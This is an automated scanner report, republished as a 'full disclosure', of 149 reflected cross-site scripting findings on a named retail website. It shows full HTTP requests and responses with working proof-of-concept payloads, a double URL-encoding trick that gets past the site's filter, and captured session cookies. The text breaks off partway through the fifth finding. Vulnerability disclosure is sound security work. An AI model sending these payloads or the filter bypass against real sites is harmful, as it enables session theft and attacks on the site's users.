Current Research | Full Disclosure | As of March 14, 2011

Plesk SMB 10.2.0 Windows - Site Editor | Full Disclosure
Plesk Small Business Manager 10.2.0 for Windows | Full Disclosure
Hoyt LLC Research | Full Disclosure Report on Stored XSS in SmarterMail 8.0
Hoyt LLC Research - Full Disclosure | Blog Article | SmarterStats 6.0
Hoyt LLC Research - Full Disclosure | Blog Article | SmarterMail 7.x Series
Report generated by XSS.CX at Sat Nov 20 20:54:25 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research


Contents

Loading

1. Cross-site scripting (reflected)

1.1. http://www.turnerlicensing.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.turnerlicensing.com/11x17_recordable_message_centers [name of an arbitrarily supplied request parameter]

1.3. http://www.turnerlicensing.com/11x17_sound_message_centers [name of an arbitrarily supplied request parameter]

1.4. http://www.turnerlicensing.com/2_year_planners [name of an arbitrarily supplied request parameter]

1.5. http://www.turnerlicensing.com/3_ring_binders [name of an arbitrarily supplied request parameter]

1.6. http://www.turnerlicensing.com/3_subject_notebooks [name of an arbitrarily supplied request parameter]

1.7. http://www.turnerlicensing.com/5x8_notepads [name of an arbitrarily supplied request parameter]

1.8. http://www.turnerlicensing.com/5x8_planners [name of an arbitrarily supplied request parameter]

1.9. http://www.turnerlicensing.com/MLB [name of an arbitrarily supplied request parameter]

1.10. http://www.turnerlicensing.com/NBA [name of an arbitrarily supplied request parameter]

1.11. http://www.turnerlicensing.com/NBA/atlanta_hawks [name of an arbitrarily supplied request parameter]

1.12. http://www.turnerlicensing.com/NBA/boston_celtics [name of an arbitrarily supplied request parameter]

1.13. http://www.turnerlicensing.com/NBA/boston_celtics [name of an arbitrarily supplied request parameter]

1.14. http://www.turnerlicensing.com/NBA/boston_celtics/8010782 [name of an arbitrarily supplied request parameter]

1.15. http://www.turnerlicensing.com/NBA/boston_celtics/8090823 [name of an arbitrarily supplied request parameter]

1.16. http://www.turnerlicensing.com/NBA/boston_celtics/8120527 [name of an arbitrarily supplied request parameter]

1.17. http://www.turnerlicensing.com/NBA/boston_celtics/8190305 [name of an arbitrarily supplied request parameter]

1.18. http://www.turnerlicensing.com/NBA/charlotte_bobcats [name of an arbitrarily supplied request parameter]

1.19. http://www.turnerlicensing.com/NBA/chicago_bulls [name of an arbitrarily supplied request parameter]

1.20. http://www.turnerlicensing.com/NBA/cleveland_cavaliers [name of an arbitrarily supplied request parameter]

1.21. http://www.turnerlicensing.com/NBA/dallas_mavericks [name of an arbitrarily supplied request parameter]

1.22. http://www.turnerlicensing.com/NBA/dallas_mavericks/8190309 [name of an arbitrarily supplied request parameter]

1.23. http://www.turnerlicensing.com/NBA/denver_nuggets [name of an arbitrarily supplied request parameter]

1.24. http://www.turnerlicensing.com/NBA/detroit_pistons [name of an arbitrarily supplied request parameter]

1.25. http://www.turnerlicensing.com/NBA/detroit_pistons/8170354 [name of an arbitrarily supplied request parameter]

1.26. http://www.turnerlicensing.com/NBA/golden_state_warriors [name of an arbitrarily supplied request parameter]

1.27. http://www.turnerlicensing.com/NBA/houston_rockets [name of an arbitrarily supplied request parameter]

1.28. http://www.turnerlicensing.com/NBA/indiana_pacers [name of an arbitrarily supplied request parameter]

1.29. http://www.turnerlicensing.com/NBA/los_angeles_clippers [name of an arbitrarily supplied request parameter]

1.30. http://www.turnerlicensing.com/NBA/los_angeles_lakers [name of an arbitrarily supplied request parameter]

1.31. http://www.turnerlicensing.com/NBA/los_angeles_lakers/8010793 [name of an arbitrarily supplied request parameter]

1.32. http://www.turnerlicensing.com/NBA/los_angeles_lakers/8050476 [name of an arbitrarily supplied request parameter]

1.33. http://www.turnerlicensing.com/NBA/memphis_grizzlies [name of an arbitrarily supplied request parameter]

1.34. http://www.turnerlicensing.com/NBA/miami_heat [name of an arbitrarily supplied request parameter]

1.35. http://www.turnerlicensing.com/NBA/miami_heat/8010795 [name of an arbitrarily supplied request parameter]

1.36. http://www.turnerlicensing.com/NBA/milwaukee_bucks [name of an arbitrarily supplied request parameter]

1.37. http://www.turnerlicensing.com/NBA/minnesota_timberwolves [name of an arbitrarily supplied request parameter]

1.38. http://www.turnerlicensing.com/NBA/new_jersey_nets [name of an arbitrarily supplied request parameter]

1.39. http://www.turnerlicensing.com/NBA/new_jersey_nets/8080309 [name of an arbitrarily supplied request parameter]

1.40. http://www.turnerlicensing.com/NBA/new_orleans_hornets [name of an arbitrarily supplied request parameter]

1.41. http://www.turnerlicensing.com/NBA/new_york_knicks [name of an arbitrarily supplied request parameter]

1.42. http://www.turnerlicensing.com/NBA/oklahoma_thunder [name of an arbitrarily supplied request parameter]

1.43. http://www.turnerlicensing.com/NBA/orlando_magic [name of an arbitrarily supplied request parameter]

1.44. http://www.turnerlicensing.com/NBA/philadelphia_76ers [name of an arbitrarily supplied request parameter]

1.45. http://www.turnerlicensing.com/NBA/phoenix_suns [name of an arbitrarily supplied request parameter]

1.46. http://www.turnerlicensing.com/NBA/portland_trail_blazers [name of an arbitrarily supplied request parameter]

1.47. http://www.turnerlicensing.com/NBA/sacramento_kings [name of an arbitrarily supplied request parameter]

1.48. http://www.turnerlicensing.com/NBA/san_antonio_spurs [name of an arbitrarily supplied request parameter]

1.49. http://www.turnerlicensing.com/NBA/san_antonio_spurs/8010807 [name of an arbitrarily supplied request parameter]

1.50. http://www.turnerlicensing.com/NBA/seattle_supersonics [name of an arbitrarily supplied request parameter]

1.51. http://www.turnerlicensing.com/NBA/toronto_raptors [name of an arbitrarily supplied request parameter]

1.52. http://www.turnerlicensing.com/NBA/utah_jazz [name of an arbitrarily supplied request parameter]

1.53. http://www.turnerlicensing.com/NBA/washington_wizards [name of an arbitrarily supplied request parameter]

1.54. http://www.turnerlicensing.com/NFL [name of an arbitrarily supplied request parameter]

1.55. http://www.turnerlicensing.com/NHL [name of an arbitrarily supplied request parameter]

1.56. http://www.turnerlicensing.com/Players [name of an arbitrarily supplied request parameter]

1.57. http://www.turnerlicensing.com/Stadiums [name of an arbitrarily supplied request parameter]

1.58. http://www.turnerlicensing.com/Turner-Contact-Us [name of an arbitrarily supplied request parameter]

1.59. http://www.turnerlicensing.com/Turner-Email-Sign-Up [name of an arbitrarily supplied request parameter]

1.60. http://www.turnerlicensing.com/app/site/backend/additemtocart.nl [name of an arbitrarily supplied request parameter]

1.61. http://www.turnerlicensing.com/book_covers [name of an arbitrarily supplied request parameter]

1.62. http://www.turnerlicensing.com/box_calendars [name of an arbitrarily supplied request parameter]

1.63. http://www.turnerlicensing.com/composition_books [name of an arbitrarily supplied request parameter]

1.64. http://www.turnerlicensing.com/desk_calendars [name of an arbitrarily supplied request parameter]

1.65. http://www.turnerlicensing.com/espn [name of an arbitrarily supplied request parameter]

1.66. http://www.turnerlicensing.com/espn/8210571 [name of an arbitrarily supplied request parameter]

1.67. http://www.turnerlicensing.com/home [name of an arbitrarily supplied request parameter]

1.68. http://www.turnerlicensing.com/magnetic_to-do_notes [name of an arbitrarily supplied request parameter]

1.69. http://www.turnerlicensing.com/memo_books [name of an arbitrarily supplied request parameter]

1.70. http://www.turnerlicensing.com/nondated_combo_packs [name of an arbitrarily supplied request parameter]

1.71. http://www.turnerlicensing.com/paper_and_desk_caddy [name of an arbitrarily supplied request parameter]

1.72. http://www.turnerlicensing.com/paper_cubes [name of an arbitrarily supplied request parameter]

1.73. http://www.turnerlicensing.com/portfolios [name of an arbitrarily supplied request parameter]

1.74. http://www.turnerlicensing.com/s.nl [bce72 parameter]

1.75. http://www.turnerlicensing.com/s.nl [name of an arbitrarily supplied request parameter]

1.76. http://www.turnerlicensing.com/s.nl [name of an arbitrarily supplied request parameter]

1.77. http://www.turnerlicensing.com/s.nl/sc.34/.f [name of an arbitrarily supplied request parameter]

1.78. http://www.turnerlicensing.com/teams_by_state/Alabama [name of an arbitrarily supplied request parameter]

1.79. http://www.turnerlicensing.com/teams_by_state/Alaska [name of an arbitrarily supplied request parameter]

1.80. http://www.turnerlicensing.com/teams_by_state/Arizona [name of an arbitrarily supplied request parameter]

1.81. http://www.turnerlicensing.com/teams_by_state/Arkansas [name of an arbitrarily supplied request parameter]

1.82. http://www.turnerlicensing.com/teams_by_state/Calgary [name of an arbitrarily supplied request parameter]

1.83. http://www.turnerlicensing.com/teams_by_state/California [name of an arbitrarily supplied request parameter]

1.84. http://www.turnerlicensing.com/teams_by_state/Colorado [name of an arbitrarily supplied request parameter]

1.85. http://www.turnerlicensing.com/teams_by_state/Connecticut [name of an arbitrarily supplied request parameter]

1.86. http://www.turnerlicensing.com/teams_by_state/Delaware [name of an arbitrarily supplied request parameter]

1.87. http://www.turnerlicensing.com/teams_by_state/Edmonton [name of an arbitrarily supplied request parameter]

1.88. http://www.turnerlicensing.com/teams_by_state/Florida [name of an arbitrarily supplied request parameter]

1.89. http://www.turnerlicensing.com/teams_by_state/Georgia [name of an arbitrarily supplied request parameter]

1.90. http://www.turnerlicensing.com/teams_by_state/Hawaii [name of an arbitrarily supplied request parameter]

1.91. http://www.turnerlicensing.com/teams_by_state/Idaho [name of an arbitrarily supplied request parameter]

1.92. http://www.turnerlicensing.com/teams_by_state/Illinois [name of an arbitrarily supplied request parameter]

1.93. http://www.turnerlicensing.com/teams_by_state/Indiana [name of an arbitrarily supplied request parameter]

1.94. http://www.turnerlicensing.com/teams_by_state/Iowa [name of an arbitrarily supplied request parameter]

1.95. http://www.turnerlicensing.com/teams_by_state/Kansas [name of an arbitrarily supplied request parameter]

1.96. http://www.turnerlicensing.com/teams_by_state/Kentucky [name of an arbitrarily supplied request parameter]

1.97. http://www.turnerlicensing.com/teams_by_state/Louisiana [name of an arbitrarily supplied request parameter]

1.98. http://www.turnerlicensing.com/teams_by_state/Maryland [name of an arbitrarily supplied request parameter]

1.99. http://www.turnerlicensing.com/teams_by_state/Massachusetts [name of an arbitrarily supplied request parameter]

1.100. http://www.turnerlicensing.com/teams_by_state/Michigan [name of an arbitrarily supplied request parameter]

1.101. http://www.turnerlicensing.com/teams_by_state/Minnesota [name of an arbitrarily supplied request parameter]

1.102. http://www.turnerlicensing.com/teams_by_state/Mississippi [name of an arbitrarily supplied request parameter]

1.103. http://www.turnerlicensing.com/teams_by_state/Missouri [name of an arbitrarily supplied request parameter]

1.104. http://www.turnerlicensing.com/teams_by_state/Montana [name of an arbitrarily supplied request parameter]

1.105. http://www.turnerlicensing.com/teams_by_state/Montreal [name of an arbitrarily supplied request parameter]

1.106. http://www.turnerlicensing.com/teams_by_state/Nebraska [name of an arbitrarily supplied request parameter]

1.107. http://www.turnerlicensing.com/teams_by_state/Nevada [name of an arbitrarily supplied request parameter]

1.108. http://www.turnerlicensing.com/teams_by_state/New-Hampshire [name of an arbitrarily supplied request parameter]

1.109. http://www.turnerlicensing.com/teams_by_state/New-Jersey [name of an arbitrarily supplied request parameter]

1.110. http://www.turnerlicensing.com/teams_by_state/New-Mexico [name of an arbitrarily supplied request parameter]

1.111. http://www.turnerlicensing.com/teams_by_state/New-York [name of an arbitrarily supplied request parameter]

1.112. http://www.turnerlicensing.com/teams_by_state/North-Carolina [name of an arbitrarily supplied request parameter]

1.113. http://www.turnerlicensing.com/teams_by_state/North-Dakota [name of an arbitrarily supplied request parameter]

1.114. http://www.turnerlicensing.com/teams_by_state/Ohio [name of an arbitrarily supplied request parameter]

1.115. http://www.turnerlicensing.com/teams_by_state/Oklahoma [name of an arbitrarily supplied request parameter]

1.116. http://www.turnerlicensing.com/teams_by_state/Oregon [name of an arbitrarily supplied request parameter]

1.117. http://www.turnerlicensing.com/teams_by_state/Ottawa [name of an arbitrarily supplied request parameter]

1.118. http://www.turnerlicensing.com/teams_by_state/Pennsylvania [name of an arbitrarily supplied request parameter]

1.119. http://www.turnerlicensing.com/teams_by_state/Rhode-Island [name of an arbitrarily supplied request parameter]

1.120. http://www.turnerlicensing.com/teams_by_state/South-Carolina [name of an arbitrarily supplied request parameter]

1.121. http://www.turnerlicensing.com/teams_by_state/South-Dakota [name of an arbitrarily supplied request parameter]

1.122. http://www.turnerlicensing.com/teams_by_state/Tennessee [name of an arbitrarily supplied request parameter]

1.123. http://www.turnerlicensing.com/teams_by_state/Texas [name of an arbitrarily supplied request parameter]

1.124. http://www.turnerlicensing.com/teams_by_state/Toronto [name of an arbitrarily supplied request parameter]

1.125. http://www.turnerlicensing.com/teams_by_state/Utah [name of an arbitrarily supplied request parameter]

1.126. http://www.turnerlicensing.com/teams_by_state/Vancouver [name of an arbitrarily supplied request parameter]

1.127. http://www.turnerlicensing.com/teams_by_state/Vermont [name of an arbitrarily supplied request parameter]

1.128. http://www.turnerlicensing.com/teams_by_state/Virginia [name of an arbitrarily supplied request parameter]

1.129. http://www.turnerlicensing.com/teams_by_state/Washington [name of an arbitrarily supplied request parameter]

1.130. http://www.turnerlicensing.com/teams_by_state/Washington-D-C [name of an arbitrarily supplied request parameter]

1.131. http://www.turnerlicensing.com/teams_by_state/West-Virginia [name of an arbitrarily supplied request parameter]

1.132. http://www.turnerlicensing.com/teams_by_state/Wisconsin [name of an arbitrarily supplied request parameter]

1.133. http://www.turnerlicensing.com/teams_by_state/Wyoming [name of an arbitrarily supplied request parameter]

1.134. http://www.turnerlicensing.com/turner [name of an arbitrarily supplied request parameter]

1.135. http://www.turnerlicensing.com/turner_about_us [name of an arbitrarily supplied request parameter]

1.136. http://www.turnerlicensing.com/turner_boxed_note_cards [name of an arbitrarily supplied request parameter]

1.137. http://www.turnerlicensing.com/turner_christmas_cards [name of an arbitrarily supplied request parameter]

1.138. http://www.turnerlicensing.com/turner_deluxe_journals [name of an arbitrarily supplied request parameter]

1.139. http://www.turnerlicensing.com/turner_frequently_asked_questions [name of an arbitrarily supplied request parameter]

1.140. http://www.turnerlicensing.com/turner_mini_wall_calendars [name of an arbitrarily supplied request parameter]

1.141. http://www.turnerlicensing.com/turner_notebooks [name of an arbitrarily supplied request parameter]

1.142. http://www.turnerlicensing.com/turner_payment_options [name of an arbitrarily supplied request parameter]

1.143. http://www.turnerlicensing.com/turner_privacy_security [name of an arbitrarily supplied request parameter]

1.144. http://www.turnerlicensing.com/turner_puzzles [name of an arbitrarily supplied request parameter]

1.145. http://www.turnerlicensing.com/turner_returns_exchanges [name of an arbitrarily supplied request parameter]

1.146. http://www.turnerlicensing.com/turner_shipping_information [name of an arbitrarily supplied request parameter]

1.147. http://www.turnerlicensing.com/turner_sitemap [name of an arbitrarily supplied request parameter]

1.148. http://www.turnerlicensing.com/turner_tax_information [name of an arbitrarily supplied request parameter]

1.149. http://www.turnerlicensing.com/turner_wall_calendars [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 149 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.turnerlicensing.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 616be%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527018d474a113 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 616be'style='x:expression(alert(1))'018d474a113 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /?616be%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527018d474a113=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId3=rnoX2q9XAatYKaJC; JSESSIONID=5FGwMyBPj2G9W1Yp7Zy2vGPjsmpGvTRLK5dLCcGL1LQd27JDFJ2hjzvGZJdq31s19kkgnxsBqmQQqJp7C24sztLlX2QJNz6JFx0xSDXrxwjDszkrLTjK3L22n5n1bXhG!-639703385; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290272830.1290272924.6; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.1.10.1290272924
Host: www.turnerlicensing.com

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:26 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 328662000:73686F702D6A6176613034302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=VJtCMyKpYCsTv7gJCDNfCpFYc2fkfz1c7ycNT5yyhpcxp2g3L0JTnvLKZ1B0pF2vjyz7TWkwwv9ZMnNMMjJhTyg6JTsGpRqwWrFRt7zybbF3Hwppyp1FMzmhKmhQKppz!-639703385; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 17:51:27 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 41613


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Homepage - Turner</title>


<meta name=...robots... content=...NOODP,NOYDIR...>
<script language='JavaScript'
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/?616be%27style%3d%27x%3aexpression%28alert%281%29%29%27018d474a113=1&616be'style='x:expression(alert(1))'018d474a113=1'>
...[SNIP]...

1.2. http://www.turnerlicensing.com/11x17_recordable_message_centers [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /11x17_recordable_message_centers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 75fdb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527768256e6a68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75fdb'style='x:expression(alert(1))'768256e6a68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /11x17_recordable_message_centers?75fdb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527768256e6a68=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:16 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1699153863:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=964
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100076


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>11x17 Recordable Message Centers</title>


<script language='JavaScript' type='text/javascript'>window.status=
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=262186&75fdb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527768256e6a68=1&75fdb'style='x:expression(alert(1))'768256e6a68=1&fromsla=T&75fdb%27style%3d%27x%3aexpression%28alert%281%29%29%27768256e6a68=1'>
...[SNIP]...

1.3. http://www.turnerlicensing.com/11x17_sound_message_centers [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /11x17_sound_message_centers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cc6b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eea3ebc05ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4cc6b'style='x:expression(alert(1))'eea3ebc05ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /11x17_sound_message_centers?4cc6b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eea3ebc05ed=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:18 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -109265876:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=926
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100288


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>11x17 Sound Message Centers</title>


<script language='JavaScript' type='text/javascript'>window.status='Load
...[SNIP]...
erlicensing.com/s.nl?category=175948&4cc6b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eea3ebc05ed=1&4cc6b%27style%3d%27x%3aexpression%28alert%281%29%29%27eea3ebc05ed=1&fromsla=T&4cc6b'style='x:expression(alert(1))'eea3ebc05ed=1'>
...[SNIP]...

1.4. http://www.turnerlicensing.com/2_year_planners [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /2_year_planners

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 59479%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527789fbd98f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59479'style='x:expression(alert(1))'789fbd98f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /2_year_planners?59479%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527789fbd98f9=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:17 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 778535204:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=993
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 99347


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>2 Year Planners</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=730809&59479%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527789fbd98f9=1&59479'style='x:expression(alert(1))'789fbd98f9=1&59479%27style%3d%27x%3aexpression%28alert%281%29%29%27789fbd98f9=1&fromsla=T'>
...[SNIP]...

1.5. http://www.turnerlicensing.com/3_ring_binders [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /3_ring_binders

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 83686%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731528bb40bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 83686'style='x:expression(alert(1))'31528bb40bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

